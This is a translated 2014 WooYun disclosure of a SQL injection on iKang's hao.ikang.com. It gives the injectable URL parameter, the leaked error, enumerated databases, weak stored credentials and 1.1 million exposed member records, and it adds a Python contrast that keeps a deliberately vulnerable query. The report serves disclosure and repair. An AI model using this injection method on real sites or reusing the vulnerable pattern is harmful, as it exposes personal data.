Vulnerability summary

Defect ID: wooyun-2014-073820

Title: A flaw at 爱康国宾 (iKang) could leak 1.1 million users' information

Vendor: 爱康国宾

Author: 小胖子

Submitted: 2014-08-25 18:49

Fixed: 2014-10-09 18:50

Published: 2014-10-09 18:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-08-25: Details sent to the vendor, awaiting vendor handling
2014-08-26: Vendor confirmed; details disclosed to the vendor only
2014-09-05: Details disclosed to core white hats and relevant domain experts
2014-09-15: Details disclosed to regular white hats
2014-09-25: Details disclosed to intern white hats
2014-10-09: Details disclosed to the public

Brief description:

Not much to say; I'm here to farm WB and join the crowdtest.

Detailed description:

Affected site: http://hao.ikang.com
Click on any hospital and you end up at a link of this form:
http://hao.ikang.com/?city=0021&Action=Operator&hospid=002
The hospid parameter is injectable; appending a single quote produces an error:

SELECT * FROM HOSPOPER WHERE HOSPID='002'' and (YKT_FLAG=0 or YKT_FLAG=2) ORDER BY OPERNAME ASCJKCITY数据库错误!请联系系统管理员解决。DB Error: unknown error
Notice: JKCITY数据库错误!请联系系统管理员解决。DB Error: unknown error in /web/mis9/libs/DatabaseJk.php on line 54


The error message also reveals the table name, which will come in handy when we look up passwords shortly.

[Screenshot: sqlin.jpg]


There are a lot of databases here; this host appears to be your main database server.

available databases [38]:


At least the following systems are hosted on it:
http://mec.ikang.com/
http://qcms.ikang.com/
http://mis2.ikang.com/
Many of the stored passwords are simple MD5 hashes, or even plaintext.
Weak credentials in trt:

[Screenshot: ruokl TRT.jpg]

[Screenshot: tingka.jpg]

hao's:

[Screenshot: 6666.jpg]

In any case, a lot of these systems can be accessed; many databases, a lot of data.
The member tables under MIS2 and MISNEW
hold over 1.1 million member records.

[Screenshot: 1168644.jpg]


Proof of vulnerability:

Database: WWW
[44 tables]
Database: SYSTEM
[160 tables]

Fix recommendations:

0x1: Don't put every database on a single server; cross-database reads are even possible here.
0x2: Fix the injection point.
0x3: Asking for 20 rank.
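An added example (not code from the original report or from iKang) contrasting the string concatenation visible in the leaked query with the bound-parameter and allow-list fix that recommendation 0x2 calls for. It assumes a sqlite3 stand-in for the Oracle HOSPOPER table (columns HOSPID, OPERNAME, YKT_FLAG taken from the echoed query) and that hospid is a 3-digit code, as in hospid=002.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for HOSPOPER (the real backend is Oracle;
    sqlite3 is used only so this runs offline)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE HOSPOPER (HOSPID TEXT, OPERNAME TEXT, YKT_FLAG INTEGER)")
    conn.executemany(
        "INSERT INTO HOSPOPER VALUES (?, ?, ?)",
        [("002", "Clinic A", 0), ("002", "Clinic B", 1), ("003", "Clinic C", 2)],
    )
    return conn


def vulnerable_lookup(conn, hospid):
    """Mirrors the leaked query: the request parameter is pasted into the SQL text,
    so a stray quote changes the statement's structure and the DB raises an error."""
    sql = ("SELECT OPERNAME FROM HOSPOPER WHERE HOSPID='%s' "
           "and (YKT_FLAG=0 or YKT_FLAG=2) ORDER BY OPERNAME ASC" % hospid)
    return [row[0] for row in conn.execute(sql)]


def parameterized_lookup(conn, hospid):
    """Same query with hospid bound as a parameter: the driver passes it as data,
    so a quote inside the value can never terminate the string literal."""
    sql = ("SELECT OPERNAME FROM HOSPOPER WHERE HOSPID=? "
           "and (YKT_FLAG=0 or YKT_FLAG=2) ORDER BY OPERNAME ASC")
    return [row[0] for row in conn.execute(sql, (hospid,))]


# Assumed format: hospid is a three-digit code (hospid=002 on the page).
HOSPID_PATTERN = re.compile(r"[0-9]{3}")


def validated_lookup(conn, hospid):
    """Defence in depth: allow-list the value before it reaches the database."""
    if not HOSPID_PATTERN.fullmatch(hospid):
        raise ValueError("hospid rejected by allow-list")
    return parameterized_lookup(conn, hospid)


def outcome(fn, conn, hospid):
    """Return rows, or only a short error class name: the original page leaked the
    full SQL text and a server file path because the raw DB error was echoed."""
    try:
        return fn(conn, hospid)
    except (sqlite3.Error, ValueError) as exc:
        return "error: " + type(exc).__name__
```

With an Oracle driver the placeholder syntax differs (cx_Oracle uses named binds such as :hospid), but the separation of query text from data is the same.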

Copyright notice: reprints must credit the source, 小胖子@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2014-08-26 11:56

Vendor reply:

Thank you very much for finding this vulnerability. It has been confirmed and we will handle it as soon as possible. Thanks!

Latest status:

None yet